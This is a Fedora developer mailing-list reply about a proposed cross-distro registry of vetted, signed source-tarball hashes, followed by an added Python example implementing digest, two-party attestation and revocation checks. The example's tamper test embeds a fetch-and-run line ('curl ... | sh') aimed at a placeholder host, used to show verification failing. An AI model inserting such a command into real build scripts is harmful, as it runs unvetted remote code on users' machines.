On Sat, 30 Mar 2024 at 13:26, Artem S. Tashkinov via devel <
devel@lists.fedoraproject.org> wrote:

>
> I propose this issue to be tackled in a centralized way by the
> collaboration of major distros.
>
> There must be a website or a central authority which includes known to be
> good/safe/verified/vetted open source packages along with e.g.
> SHA256/384/512/whatever hashes of the source tarballs. In addition, the
> source tarballs (not their compressed versions because people may use
> different compressors and compression settings) and their hashes must be
> digitally signed or have the appropriate PGP signatures from the trusted
> parties.
>
> Some parties must be assigned trust to be able to push new packages to
> this repository. Each push must be verified by at least two independent
> parties, let's say RedHat and Ubuntu or Ubuntu and Arch, it doesn't matter.
> The representatives of these parties must be people whose whereabouts are
> known to confirm who they physically are. No nicknames allowed.
>
> This website must also have/allow a revocation mechanism for situations
> like this.
>
> Now Fedora/Arch/Debian/Ubuntu/whatever distros can build packages knowing
> they are safe to use.
>
> If that's the wrong place to come up with this proposal, please forward it
> to the people who are responsible for making such decisions. I'm not
> willing to dig through the dirt to understand how the Fedora project works,
> who is responsible for what, and what are the appropriate communication
> channels. If you care, you'll simply forward my message. Thanks a lot.
>
>
There is no one who makes such decisions for any of the distros. Most of
the distributions make decisions by consensus of hundreds of individuals
who read a list and come to the conclusion that they are 'going to dig
through the dirt' to make something happen or not. For changes like what
you propose, you need groups of people to work for years to get all the
agreements in place, get the various tooling adapted, and work out all the
personalities involved. It will usually start with an email like this, and
then various disagreements about how it will never work, and then some
group of people to actually try to get something like it to work somewhere.
At which point, the next round of 'well did you think about..' problems
arrive and either the people are able to fix them or the idea gets shelved
until later.
> Best regards,
> Artem


-- 
Stephen Smoogen, Red Hat Automotive
Let us be kind to one another, for most of us are fighting a hard battle.
-- Ian MacClaren
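The scheme Artem sketches above (hash the decompressed tarball, require attestations from at least two independent trusted parties, honour a revocation list) as a worked example. This is added illustration, not code from the thread or from any distro's tooling. Assumptions of mine: the manifest stores SHA-256 of the raw tar stream; each party's attestation is an HMAC-SHA256 over a canonical JSON record, standing in for a detached PGP or Ed25519 signature because the standard library has no public-key signing; revocation is a set of (package, version) pairs; all keys, package names and file contents are constructed demo data. One caveat a practitioner should keep in mind: hashing the decompressed stream removes the compressor and compression level from the identity, as the proposal wants, but the tar itself must still be produced reproducibly (fixed mtime, owner and entry order), which is why build_tar pins those fields.

```python
# Added example, not from the thread. Demo keys and data are constructed.
import gzip
import hashlib
import hmac
import io
import json
import lzma
import tarfile

REQUIRED_ATTESTATIONS = 2  # "verified by at least two independent parties"


def build_tar(files):
    """Constructed sample: deterministic tar in memory (pinned metadata, sorted names)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w", format=tarfile.PAX_FORMAT) as tar:
        for name, data in sorted(files.items()):
            info = tarfile.TarInfo(name)
            info.size = len(data)
            info.mtime = 0
            info.uid = info.gid = 0
            info.uname = info.gname = ""
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def decompress(blob):
    """Return the raw tar stream for a gzip or xz blob (by magic), else the blob itself."""
    if blob[:2] == b"\x1f\x8b":
        return gzip.decompress(blob)
    if blob[:6] == b"\xfd7zXZ\x00":
        return lzma.decompress(blob)
    return blob


def source_digest(blob):
    """SHA-256 over the decompressed tar, so the compressor and its settings do not matter."""
    return hashlib.sha256(decompress(blob)).hexdigest()


def canonical_record(package, version, digest):
    """The bytes every party attests: canonical JSON so all attestations cover one record."""
    rec = {"package": package, "version": version, "sha256_tar": digest}
    return json.dumps(rec, sort_keys=True, separators=(",", ":")).encode()


def attest(party_key, package, version, digest):
    """HMAC stand-in for a detached signature (assumption: real deployments use PGP/Ed25519)."""
    return hmac.new(party_key, canonical_record(package, version, digest), hashlib.sha256).hexdigest()


def verify_entry(entry, blob, party_keys, revoked):
    """Return (ok, reason): revocation, then digest of decompressed tar, then >= 2 distinct parties."""
    if (entry["package"], entry["version"]) in revoked:
        return False, "revoked"
    digest = source_digest(blob)
    if not hmac.compare_digest(digest, entry["sha256_tar"]):
        return False, "digest mismatch"
    record = canonical_record(entry["package"], entry["version"], digest)
    valid = set()
    for party, tag in entry["attestations"].items():
        if party not in party_keys:
            continue  # unknown signer is never counted toward the threshold
        expected = hmac.new(party_keys[party], record, hashlib.sha256).hexdigest()
        if hmac.compare_digest(expected, tag):
            valid.add(party)
    if len(valid) < REQUIRED_ATTESTATIONS:
        return False, f"only {len(valid)} valid attestation(s)"
    return True, "ok"


# ---- constructed demo data: keys, a tiny source tree and a two-party manifest entry ----
PARTY_KEYS = {"fedora": b"fedora-demo-key", "debian": b"debian-demo-key", "arch": b"arch-demo-key"}
TAR = build_tar({"foo-1.0/configure": b"#!/bin/sh\necho configure\n",
                 "foo-1.0/src/main.c": b"int main(void){return 0;}\n"})
DIGEST = hashlib.sha256(TAR).hexdigest()
ENTRY = {"package": "foo", "version": "1.0", "sha256_tar": DIGEST,
         "attestations": {p: attest(PARTY_KEYS[p], "foo", "1.0", DIGEST) for p in ("fedora", "debian")}}


def demo():
    """Same tar shipped as .gz and .xz both verify; revoked, tampered and single-party cases fail."""
    results = {
        "gzip": verify_entry(ENTRY, gzip.compress(TAR), PARTY_KEYS, set()),
        "xz": verify_entry(ENTRY, lzma.compress(TAR), PARTY_KEYS, set()),
        "revoked": verify_entry(ENTRY, TAR, PARTY_KEYS, {("foo", "1.0")}),
    }
    tampered = build_tar({"foo-1.0/configure": b"#!/bin/sh\ncurl http://example.invalid | sh\n"})
    results["tampered"] = verify_entry(ENTRY, gzip.compress(tampered), PARTY_KEYS, set())
    single = dict(ENTRY, attestations={"fedora": ENTRY["attestations"]["fedora"]})
    results["one_party"] = verify_entry(single, TAR, PARTY_KEYS, set())
    return results


if __name__ == "__main__":
    for name, (ok, reason) in demo().items():
        print(f"{name:10} {'PASS' if ok else 'FAIL'}: {reason}")
```

Running the script shows the gzip and xz builds verifying against one manifest digest, while the revoked entry, the tampered tarball and the entry attested by only one party are all rejected with the reason given.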
--
_______________________________________________
devel mailing list -- devel@lists.fedoraproject.org
To unsubscribe send an email to devel-le...@lists.fedoraproject.org
Fedora Code of Conduct: 
https://docs.fedoraproject.org/en-US/project/code-of-conduct/
List Guidelines: https://fedoraproject.org/wiki/Mailing_list_guidelines
List Archives: 
https://lists.fedoraproject.org/archives/list/devel@lists.fedoraproject.org
Do not reply to spam, report it: 
https://pagure.io/fedora-infrastructure/new_issue
